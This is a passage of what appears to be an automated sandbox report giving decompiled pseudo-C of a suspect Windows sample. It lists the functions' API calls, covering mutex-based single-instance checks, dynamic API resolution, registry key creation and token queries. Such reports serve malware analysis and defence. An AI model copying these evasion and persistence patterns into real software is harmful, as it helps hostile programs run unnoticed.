						if( *_t31 == 0) {
							L40:
							 *((intOrPtr*)(_t61 - 4)) = 0xfffffffe;
							_t32 = 0xff;
						} else {
							_t34 =  *_t31;
							while(1) {
								 *(_t61 - 0x24) = _t34;
								_t44 =  *_t34 & 0x0000ffff;
								if(_t44 > 0x20 || _t44 != 0 &&  *(_t61 - 0x1c) != 0) {
									goto L34;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t47 =  *_t34 & 0x0000ffff;
									if(_t47 == 0 || _t47 > 0x20) {
										break;
									}
									_t34 = _t34 + 2;
									 *(_t61 - 0x24) = _t34;
								}
								__eflags =  *(_t61 - 0x40) & 0x00000001;
								if(( *(_t61 - 0x40) & 0x00000001) == 0) {
									_t44 = 0xa;
								} else {
									_t44 =  *(_t61 - 0x3c) & 0x0000ffff;
								}
								_push(_t44);
								_push(_t34);
								_push(0);
								_push(0x3c0000); // executed
								L003CFBF0(); // executed
								 *0x3e8658 = _t34;
								__eflags =  *0x3e864c; // 0x0
								if(__eflags == 0) {
									exit(_t34);
									goto L34;
								}
								__eflags =  *0x3e865c; // 0x0
								if(__eflags == 0) {
									__imp___cexit();
								}
								 *((intOrPtr*)(_t61 - 4)) = 0xfffffffe;
								_t32 =  *0x3e8658; // 0x0
								goto L41;
								L34:
								__eflags = _t44 - 0x22;
								if(_t44 == 0x22) {
									__eflags =  *(_t61 - 0x1c);
									_t19 =  *(_t61 - 0x1c) == 0;
									__eflags = _t19;
									 *(_t61 - 0x1c) = 0 | _t19;
								}
								_t34 = _t34 + 2;
							}
						}
					}
					L41:
					return E003E2829(_t32);
				}
				_t59 = 1;
				__eflags = 1;
				goto L7;
			}

















    0x003cd616
    0x003e2436
    0x003e2438
    0x003e243d
    0x003e2444
    0x003e2447
    0x003e244e
    0x003e2454
    0x003e245b
    0x003e2468
    0x003e246b
    0x003e2473
    0x003e2476
    0x003e247e
    0x00000000
    0x00000000
    0x003e2482
    0x003e2491
    0x00000000
    0x003e2484
    0x003e2486
    0x003e2487
    0x003e2487
    0x003e249c
    0x003e249c
    0x003e24a3
    0x003e24af
    0x003e24b4
    0x003e24b6
    0x003e24d8
    0x00000000
    0x003e24b8
    0x003e24b8
    0x003e24c8
    0x003e24cf
    0x003e24d1
    0x00000000
    0x003e24d3
    0x00000000
    0x003e24d3
    0x003e24d1
    0x003e24a5
    0x003e24a5
    0x003e24a7
    0x003e24de
    0x003e24de
    0x003e24e5
    0x003e24e7
    0x003e24ec
    0x003e24f1
    0x003e24f8
    0x003e24f8
    0x003e2505
    0x003e2509
    0x003e2509
    0x003e250f
    0x003e2515
    0x003e2517
    0x003e2524
    0x003e252a
    0x003e252a
    0x003e2524
    0x003e2530
    0x003e2537
    0x003e2602
    0x003e2602
    0x003e2609
    0x003e253d
    0x003e253d
    0x003e253f
    0x003e253f
    0x003e2542
    0x003e2549
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003e2555
    0x003e2555
    0x003e2555
    0x003e255b
    0x00000000
    0x00000000
    0x003e2564
    0x003e2565
    0x003e2565
    0x003e256a
    0x003e256e
    0x003e2578
    0x003e2570
    0x003e2570
    0x003e2570
    0x003e2579
    0x003e257a
    0x003e257b
    0x003e257c
    0x003e2581
    0x003e2586
    0x003e258b
    0x003e2591
    0x003e2594
    0x00000000
    0x003e2594
    0x003e25df
    0x003e25e5
    0x003e25e7
    0x003e25e7
    0x003e25ed
    0x003e25f4
    0x00000000
    0x003e259a
    0x003e259a
    0x003e259e
    0x003e25a2
    0x003e25a5
    0x003e25a5
    0x003e25a8
    0x003e25a8
    0x003e25ac
    0x003e25ac
    0x003e253f
    0x003e2537
    0x003e260e
    0x003e2613
    0x003e2613
    0x003e249b
    0x003e249b
    0x00000000

    APIs
      • Part of subcall function 003C7131: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 003C7168
      • Part of subcall function 003C7131: GetCurrentProcessId.KERNEL32 ref: 003C7174
      • Part of subcall function 003C7131: GetCurrentThreadId.KERNEL32 ref: 003C717C
      • Part of subcall function 003C7131: GetTickCount.KERNEL32 ref: 003C7184
      • Part of subcall function 003C7131: QueryPerformanceCounter.KERNEL32(?), ref: 003C7190
    • GetStartupInfoW.KERNEL32(?,003E6B40,0000005C), ref: 003E244E
    • InterlockedCompareExchange.KERNEL32(003E8C3C,?,00000000), ref: 003E2476
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003C3500, Relevance: 4.6, APIs: 3, Instructions: 66
    C-Code - Quality: 100%
    			E003C3500(void** __ecx, void* __eflags) {
				int _v8;
				int _v12;
				int _v16;
				char _v20;
				short _v220;
				intOrPtr _t22;
				int _t23;
				void* _t27;
				int _t28;
				intOrPtr _t29;
				intOrPtr _t38;
				void* _t45;
				void** _t46;
				void* _t48;
				struct _SECURITY_ATTRIBUTES* _t49;

				_t46 = __ecx;
				_v8 = 0;
				E003C9090(__eflags,  &_v220, 0xa2);
				_t22 =  *0x3e8628; // 0x622508
				_t23 =  *((intOrPtr*)( *((intOrPtr*)(_t22 + 0x174))))( &_v220, 1,  &_v8, 0, _t45, _t48); // executed
				if(_t23 != 0) {
					_t49 =  &_v20;
				} else {
					_v8 = _t23;
					_t49 = 0;
				}
				_v20 = 0xc;
				_v12 = 0;
				_v16 = _v8;
				E003CF0B0( &_v220);
				_t27 = CreateMutexW(_t49, 1,  &_v220); // executed
				 *_t46 = _t27;
				_t28 = _v8;
				if(_t28 != 0) {
					_t38 =  *0x3e8628; // 0x622508
					 *((intOrPtr*)( *((intOrPtr*)(_t38 + 0x9c))))(_t28);
				}
				if( *_t46 == 0) {
					ExitProcess(0);
				}
				_t29 =  *0x3e8628; // 0x622508
				return 0 |  *((intOrPtr*)( *((intOrPtr*)(_t29 + 0x30))))() == 0x000000b7;
			}


















    0x003c3517
    0x003c3519
    0x003c3520
    0x003c3525
    0x003c3542
    0x003c3546
    0x003c354f
    0x003c3548
    0x003c3548
    0x003c354b
    0x003c354b
    0x003c355c
    0x003c3563
    0x003c356a
    0x003c356d
    0x003c358b
    0x003c358d
    0x003c358f
    0x003c3594
    0x003c3596
    0x003c35a3
    0x003c35a3
    0x003c35aa
    0x003c35ae
    0x003c35ae
    0x003c35b4
    0x003c35cd

    APIs
    • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000001,00000000,00000000,003E8C3C,000003E7), ref: 003C3542
      • Part of subcall function 003CF0B0: memset.MSVCRT ref: 003CF0CE
      • Part of subcall function 003CF0B0: GetWindowsDirectoryW.KERNEL32(?,00000208), ref: 003CF0E2
      • Part of subcall function 003CF0B0: GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003CF11E
    • CreateMutexW.KERNELBASE(?,00000001,?), ref: 003C358B
    • ExitProcess.KERNEL32 ref: 003C35AE
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003E24B9, Relevance: 4.6, APIs: 3, Instructions: 59
    C-Code - Quality: 40%
    			E003E24B9(void* __eax, long __ebx, LONG* __edi, void* __esi) {
				void* _t17;
				intOrPtr _t18;
				int* _t19;
				int _t20;
				int _t22;
				signed int _t25;
				long _t28;
				signed int _t31;
				signed int _t34;
				LONG* _t38;
				void* _t40;

				_t39 = __esi;
				_t38 = __edi;
				_t28 = __ebx;
				_t17 = E003D1B59(0x3e3240, 0x3e324c); // executed
				if(_t17 == 0) {
					_t18 =  *0x3e8c38; // 0x2
					__eflags = _t18 - __esi;
					if(_t18 == __esi) {
						_push(0x3e323c);
						_push(0x3e3234); // executed
						L003C27A8(); // executed
						 *0x3e8c38 = 2;
					}
					__eflags =  *((intOrPtr*)(_t40 - 0x20)) - _t28;
					if( *((intOrPtr*)(_t40 - 0x20)) == _t28) {
						InterlockedExchange(_t38, _t28);
					}
					__eflags =  *0x3e8c40 - _t28; // 0x0
					if(__eflags != 0) {
						_push(0x3e8c40);
						_t25 = E003C3D60(_t28, _t38, _t39, __eflags);
						__eflags = _t25;
						if(_t25 != 0) {
							 *0x3e8c40(_t28, 2, _t28);
						}
					}
					_t19 = __imp___wcmdln;
					__eflags =  *_t19 - _t28;
					if( *_t19 == _t28) {
						L28:
						 *((intOrPtr*)(_t40 - 4)) = 0xfffffffe;
						_t20 = 0xff;
						goto L29;
					} else {
						_t22 =  *_t19;
						while(1) {
							 *(_t40 - 0x24) = _t22;
							_t31 =  *_t22 & 0x0000ffff;
							__eflags = _t31 - 0x20;
							if(_t31 > 0x20) {
								goto L22;
							}
							__eflags = _t31 - _t28;
							if(_t31 == _t28) {
								while(1) {
									L14:
									_t34 =  *_t22 & 0x0000ffff;
									__eflags = _t34 - _t28;
									if(_t34 == _t28) {
										break;
									}
									__eflags = _t34 - 0x20;
									if(_t34 > 0x20) {
										break;
									}
									_t22 = _t22 + 2;
									 *(_t40 - 0x24) = _t22;
								}
								__eflags =  *(_t40 - 0x40) & 0x00000001;
								if(( *(_t40 - 0x40) & 0x00000001) == 0) {
									_t31 = 0xa;
								} else {
									_t31 =  *(_t40 - 0x3c) & 0x0000ffff;
								}
								_push(_t31);
								_push(_t22);
								_push(_t28);
								_push(0x3c0000); // executed
								L003CFBF0(); // executed
								 *0x3e8658 = _t22;
								__eflags =  *0x3e864c - _t28; // 0x0
								if(__eflags != 0) {
									__eflags =  *0x3e865c - _t28; // 0x0
									if(__eflags == 0) {
										__imp___cexit();
									}
									 *((intOrPtr*)(_t40 - 4)) = 0xfffffffe;
									_t20 =  *0x3e8658; // 0x0
									L29:
									return E003E2829(_t20);
								} else {
									exit(_t22);
									goto L22;
								}
							}
							__eflags =  *(_t40 - 0x1c) - _t28;
							if( *(_t40 - 0x1c) != _t28) {
								goto L22;
							}
							goto L14;
							L22:
							__eflags = _t31 - 0x22;
							if(_t31 == 0x22) {
								__eflags =  *(_t40 - 0x1c) - _t28;
								_t11 =  *(_t40 - 0x1c) == _t28;
								__eflags = _t11;
								 *(_t40 - 0x1c) = 0 | _t11;
							}
							_t22 = _t22 + 2;
						}
					}
				}
				goto L28;
			}














    0x003e24b9
    0x003e24b9
    0x003e24b9
    0x003e24c8
    0x003e24d1
    0x003e24de
    0x003e24e3
    0x003e24e5
    0x003e24e7
    0x003e24ec
    0x003e24f1
    0x003e24f8
    0x003e24f8
    0x003e2502
    0x003e2505
    0x003e2509
    0x003e2509
    0x003e250f
    0x003e2515
    0x003e2517
    0x003e251c
    0x003e2522
    0x003e2524
    0x003e252a
    0x003e252a
    0x003e2524
    0x003e2530
    0x003e2535
    0x003e2537
    0x003e2602
    0x003e2602
    0x003e2609
    0x00000000
    0x003e253d
    0x003e253d
    0x003e253f
    0x003e253f
    0x003e2542
    0x003e2545
    0x003e2549
    0x00000000
    0x00000000
    0x003e254b
    0x003e254e
    0x003e2555
    0x003e2555
    0x003e2555
    0x003e2558
    0x003e255b
    0x00000000
    0x00000000
    0x003e255d
    0x003e2561
    0x00000000
    0x00000000
    0x003e2564
    0x003e2565
    0x003e2565
    0x003e256a
    0x003e256e
    0x003e2578
    0x003e2570
    0x003e2570
    0x003e2570
    0x003e2579
    0x003e257a
    0x003e257b
    0x003e257c
    0x003e2581
    0x003e2586
    0x003e258b
    0x003e2591
    0x003e25df
    0x003e25e5
    0x003e25e7
    0x003e25e7
    0x003e25ed
    0x003e25f4
    0x003e260e
    0x003e2613
    0x003e2593
    0x003e2594
    0x00000000
    0x003e2594
    0x003e2591
    0x003e2550
    0x003e2553
    0x00000000
    0x00000000
    0x00000000
    0x003e259a
    0x003e259a
    0x003e259e
    0x003e25a2
    0x003e25a5
    0x003e25a5
    0x003e25a8
    0x003e25a8
    0x003e25ac
    0x003e25ac
    0x003e253f
    0x003e2537
    0x00000000

    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003CF250, Relevance: 3.0, APIs: 2, Instructions: 43library
    C-Code - Quality: 100%
    			E003CF250(void* __eflags, struct HINSTANCE__* _a4) {
				short _v204;
				char _v464;
				_Unknown_base(*)()* _t14;
				intOrPtr* _t17;
				_Unknown_base(*)()** _t23;
				intOrPtr _t24;
				void* _t25;
				void* _t26;

				_t17 = _a4;
				E003C9090(__eflags,  &_v204,  *_t17);
				_t26 = _t25 + 8;
				_t14 = LoadLibraryW( &_v204);
				_t4 = _t17 + 0xc; // 0xcccccccc
				_t5 = _t17 + 4; // 0x754f10c6
				_t24 =  *_t5;
				_t23 =  *_t4 +  *0x3e8628;
				_a4 = _t14;
				_t7 = _t17 + 8; // 0xc35e5ff1
				if(_t24 <=  *_t7) {
					do {
						E003C6CB0( &_v464, _t24);
						_t26 = _t26 + 8;
						_t14 = GetProcAddress(_a4,  &_v464);
						 *_t23 = _t14;
						_t24 = _t24 + 1;
						_t23 = _t23 + 4;
						_t11 = _t17 + 8; // 0xc35e5ff1
					} while (_t24 <=  *_t11);
				}
				return _t14;
			}











    0x003cf25a
    0x003cf269
    0x003cf26e
    0x003cf278
    0x003cf27e
    0x003cf281
    0x003cf281
    0x003cf284
    0x003cf28a
    0x003cf28d
    0x003cf290
    0x003cf292
    0x003cf29a
    0x003cf2a2
    0x003cf2ad
    0x003cf2b3
    0x003cf2b5
    0x003cf2b6
    0x003cf2b9
    0x003cf2b9
    0x003cf292
    0x003cf2c4

    APIs
    • LoadLibraryW.KERNEL32(?), ref: 003CF278
    • GetProcAddress.KERNEL32(003C3E17,?), ref: 003CF2AD
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003CBAF0, Relevance: 3.0, APIs: 2, Instructions: 22
    APIs
    • CoInitializeEx.OLE32(00000000,00000000), ref: 003CBAF4
    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 003CBB13
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003CF630, Relevance: 2.6, APIs: 2, Instructions: 92
    C-Code - Quality: 95%
    			E003CF630(void* _a4, void* _a8) {
				void* _t12;
				intOrPtr _t13;
				void* _t14;
				short _t23;
				short* _t26;
				short _t27;
				short _t28;
				void* _t30;
				short _t31;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t41;
				int _t42;
				short* _t43;
				void* _t47;
				void* _t48;
				void* _t50;
				void* _t51;

				_t12 = _a8;
				if(_t12 != 0) {
					_t13 =  *0x3e8628; // 0x622508
					_t31 = 0;
					_t14 =  *((intOrPtr*)( *((intOrPtr*)(_t13 + 0xc))))(_t12, _t41, _t47, _t30);
					_t4 = _t14 + 2; // 0x2
					_t42 = _t14 + _t4;
					_t48 = E003D1D90(_t42, 0);
					memset(_t48, 0, _t42);
					memcpy(_t48, _a8, _t42);
					_t34 =  *0x3e8628; // 0x622508
					_t51 = _t50 + 0x20;
					_t7 = _t48 + 2; // 0x2
					_t43 =  *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x1e0))))(_t7, 0x3e32c4);
					__eflags = _t43;
					if(_t43 != 0) {
						while(1) {
							_t35 = _a4;
							 *_t43 = 0; // executed
							_t23 = E003CCEA0(_a4, _t48); // executed
							_t31 = _t23;
							_t51 = _t51 + 8;
							__eflags = _t31;
							if(__eflags == 0) {
								_push(0);
								_t28 = E003C97E0(_t35, __eflags, _a4, _t48); // executed
								_t51 = _t51 + 0xc;
								_t31 = _t28;
							}
							 *_t43 = 0x5c;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							}
							_t36 =  *0x3e8628; // 0x622508
							_t43 =  *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x1e0))))(_t43 + 2, 0x3e32c4);
							__eflags = _t43;
							if(_t43 != 0) {
								continue;
							} else {
								_t46 = _a4;
								_t26 = E003CCEA0(_a4, _t48); // executed
								_t51 = _t51 + 8;
								__eflags = _t26;
								if(__eflags == 0) {
									_push(0);
									_t27 = E003C97E0(_t36, __eflags, _t46, _t48); // executed
									_t51 = _t51 + 0xc;
									_t31 = _t27;
								}
							}
							goto L9;
						}
					}
					L9:
					E003CBB40(_t48);
					return _t31;
				} else {
					return 0;
				}
			}





















    0x003cf633
    0x003cf638
    0x003cf642
    0x003cf64a
    0x003cf64c
    0x003cf64e
    0x003cf64e
    0x003cf65b
    0x003cf660
    0x003cf66b
    0x003cf670
    0x003cf67c
    0x003cf684
    0x003cf68a
    0x003cf68c
    0x003cf68e
    0x003cf690
    0x003cf690
    0x003cf697
    0x003cf69a
    0x003cf69f
    0x003cf6a1
    0x003cf6a4
    0x003cf6a6
    0x003cf6ab
    0x003cf6af
    0x003cf6b4
    0x003cf6b7
    0x003cf6b7
    0x003cf6be
    0x003cf6c1
    0x003cf6c3
    0x00000000
    0x00000000
    0x003cf6c5
    0x003cf6dc
    0x003cf6de
    0x003cf6e0
    0x00000000
    0x003cf6e2
    0x003cf6e2
    0x003cf6e7
    0x003cf6ec
    0x003cf6ef
    0x003cf6f1
    0x003cf6f3
    0x003cf6f7
    0x003cf6fc
    0x003cf6ff
    0x003cf6ff
    0x003cf6f1
    0x00000000
    0x003cf6e0
    0x003cf690
    0x003cf701
    0x003cf702
    0x003cf710
    0x003cf63a
    0x003cf63d
    0x003cf63d

    APIs
      • Part of subcall function 003D1D90: LoadLibraryA.KERNEL32(?), ref: 003D1DB7
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DD8
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DFE
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E1C
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E3A
      • Part of subcall function 003D1D90: GetProcessHeap.KERNEL32 ref: 003D1E45
      • Part of subcall function 003D1D90: RtlReAllocateHeap.NTDLL(00160000,00000008,?,003D042E), ref: 003D1E5F
      • Part of subcall function 003D1D90: RtlAllocateHeap.NTDLL(00160000,00000008,003D042E), ref: 003D1E72
    • memset.MSVCRT ref: 003CF660
    • memcpy.MSVCRT ref: 003CF66B
      • Part of subcall function 003C97E0: RegCreateKeyExW.KERNEL32(?,?,00000000,00000000,00000000,00020106,00000000,00000000,00000000), ref: 003C982A
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
      • Part of subcall function 003CCEA0: lstrlenW.KERNEL32(?,?,?,?,003C97FA,?,?), ref: 003CCEBD
      • Part of subcall function 003CCEA0: RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?,?,?,003C97FA,?,?), ref: 003CCEE1
      • Part of subcall function 003CCEA0: RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?,?,?,003C97FA,?,?), ref: 003CCEFC
      • Part of subcall function 003CCEA0: RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?,?,?,003C97FA,?,?), ref: 003CCF1C
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003C3DD0, Relevance: 2.5, APIs: 2, Instructions: 27
    C-Code - Quality: 93%
    			E003C3DD0(void* __eax) {
				void* _t2;
				void* _t4;
				int _t5;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0x208);
				L003CA47E();
				_t5 = __eax;
				_t8 = _t7 + 4;
				_t9 = __eax;
				if(__eax == 0) {
					 *0x3e8628 = 0;
				} else {
					memset(__eax, 0, 0x208);
					_t8 = _t8 + 0xc;
					 *0x3e8628 = _t5;
				}
				_t6 = 0x3e8048;
				_t4 = 8;
				do {
					_t2 = E003CF250(_t9, _t6); // executed
					_t8 = _t8 + 4;
					_t6 = _t6 + 0x10;
					_t4 = _t4 - 1;
				} while (_t4 != 0);
				return _t2;
			}









    0x003c3dd2
    0x003c3dd7
    0x003c3ddc
    0x003c3dde
    0x003c3de1
    0x003c3de3
    0x003c3dfd
    0x003c3de5
    0x003c3ded
    0x003c3df2
    0x003c3df5
    0x003c3df5
    0x003c3e07
    0x003c3e0c
    0x003c3e11
    0x003c3e12
    0x003c3e17
    0x003c3e1a
    0x003c3e1d
    0x003c3e1d
    0x003c3e22

    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 003C3DD7
    • memset.MSVCRT ref: 003C3DED
      • Part of subcall function 003CF250: LoadLibraryW.KERNEL32(?), ref: 003CF278
      • Part of subcall function 003CF250: GetProcAddress.KERNEL32(003C3E17,?), ref: 003CF2AD
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003C6D30, Relevance: 1.6, APIs: 1, Instructions: 85
    C-Code - Quality: 40%
    			E003C6D30() {
				char _v8;
				long _v12;
				long _v16;
				short _v20;
				char _v24;
				void _v100;
				intOrPtr _t23;
				intOrPtr _t27;
				void* _t28;
				int _t34;
				intOrPtr _t38;
				intOrPtr _t42;
				intOrPtr _t50;
				intOrPtr _t53;
				void* _t55;

				_t23 =  *0x3e8628; // 0x622508
				_v12 = 0;
				_v16 = 0;
				_v24 = 0;
				_v20 = 0x500;
				_v8 = 0;
				_t55 = 0;
				_t8 = _t23 + 0x150; // 0x622658
				_push( *((intOrPtr*)( *((intOrPtr*)(_t23 + 0x100))))(8,  &_v12));
				if( *((intOrPtr*)( *_t8))() != 0) {
					_t34 = GetTokenInformation(_v12, 1,  &_v100, 0x4c,  &_v16); // executed
					if(_t34 != 0) {
						_t53 =  *0x3e8628; // 0x622508
						_push( &_v8);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0x12);
						_push(1);
						_push( &_v24);
						if( *((intOrPtr*)( *((intOrPtr*)(_t53 + 0x158))))() != 0) {
							_t38 =  *0x3e8628; // 0x622508
							_t55 =  *((intOrPtr*)( *((intOrPtr*)(_t38 + 0x14c))))(_v100, _v8);
						}
					}
				}
				_t27 = _v8;
				if(_t27 != 0) {
					_t50 =  *0x3e8628; // 0x622508
					 *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x154))))(_t27);
				}
				_t28 = _v12;
				if(_t28 != 0) {
					_t42 =  *0x3e8628; // 0x622508
					 *((intOrPtr*)( *((intOrPtr*)(_t42 + 0xf8))))(_t28);
				}
				return _t55;
			}


















    0x003c6d36
    0x003c6d44
    0x003c6d47
    0x003c6d4a
    0x003c6d4d
    0x003c6d53
    0x003c6d5e
    0x003c6d60
    0x003c6d68
    0x003c6d6f
    0x003c6d8d
    0x003c6d91
    0x003c6d93
    0x003c6d9c
    0x003c6da3
    0x003c6da4
    0x003c6da5
    0x003c6da6
    0x003c6da7
    0x003c6da8
    0x003c6da9
    0x003c6daa
    0x003c6dac
    0x003c6db1
    0x003c6db6
    0x003c6dbe
    0x003c6dcd
    0x003c6dcd
    0x003c6db6
    0x003c6d91
    0x003c6dcf
    0x003c6dd4
    0x003c6dd6
    0x003c6de3
    0x003c6de3
    0x003c6de5
    0x003c6dea
    0x003c6dec
    0x003c6df9
    0x003c6df9
    0x003c6e03

    APIs
    • GetTokenInformation.KERNELBASE(?,00000001,?,0000004C,?), ref: 003C6D8D
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003C97E0, Relevance: 1.5, APIs: 1, Instructions: 46registry
    C-Code - Quality: 100%
    			E003C97E0(void* __ecx, void* __eflags, void* _a4, short* _a8) {
				void* _v8;
				void* _t8;
				long _t10;
				intOrPtr _t17;
				void* _t21;
				short* _t25;

				_t25 = _a8;
				_t21 = _a4;
				_v8 = 0;
				_t8 = E003CCEA0(_t21, _t25); // executed
				if(_t8 == 0) {
					_t10 = RegCreateKeyExW(_t21, _t25, 0, 0, 0, 0x20106, 0,  &_v8, 0); // executed
					if(_t10 != 0) {
						goto L1;
					} else {
						_t17 =  *0x3e8628; // 0x622508
						 *((intOrPtr*)( *((intOrPtr*)(_t17 + 0x198))))(_v8);
						return 1;
					}
				} else {
					L1:
					return 0;
				}
			}









    0x003c97e5
    0x003c97e9
    0x003c97ee
    0x003c97f5
    0x003c97ff
    0x003c982a
    0x003c982e
    0x00000000
    0x003c9830
    0x003c9833
    0x003c9840
    0x003c9849
    0x003c9849
    0x003c9801
    0x003c9801
    0x003c9808
    0x003c9808

    APIs
      • Part of subcall function 003CCEA0: lstrlenW.KERNEL32(?,?,?,?,003C97FA,?,?), ref: 003CCEBD
      • Part of subcall function 003CCEA0: RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?,?,?,003C97FA,?,?), ref: 003CCEE1
      • Part of subcall function 003CCEA0: RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?,?,?,003C97FA,?,?), ref: 003CCEFC
      • Part of subcall function 003CCEA0: RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?,?,?,003C97FA,?,?), ref: 003CCF1C
    • RegCreateKeyExW.KERNEL32(?,?,00000000,00000000,00000000,00020106,00000000,00000000,00000000), ref: 003C982A
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003C9480, Relevance: 1.5, APIs: 1, Instructions: 18
    C-Code - Quality: 100%
    			E003C9480() {
				struct HINSTANCE__* _t3;
				struct HINSTANCE__* _t4;
				intOrPtr _t8;

				_t3 =  *0x3e85bc; // 0x0
				if(_t3 != 0) {
					_t8 =  *0x3e8628; // 0x622508
					 *((intOrPtr*)( *((intOrPtr*)(_t8 + 0x1c))))(_t3);
					 *0x3e85bc = 0;
				}
				_t4 =  *0x3e85c4; // 0x0
				if(_t4 != 0) {
					FreeLibrary(_t4); // executed
					 *0x3e85c4 = 0;
				}
				return 1;
			}






    0x003c9480
    0x003c9487
    0x003c948a
    0x003c9492
    0x003c9494
    0x003c9494
    0x003c949e
    0x003c94a5
    0x003c94b1
    0x003c94b3
    0x003c94b3
    0x003c94c2

    APIs
    • FreeLibrary.KERNELBASE(00000000,003D04F0), ref: 003C94B1
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
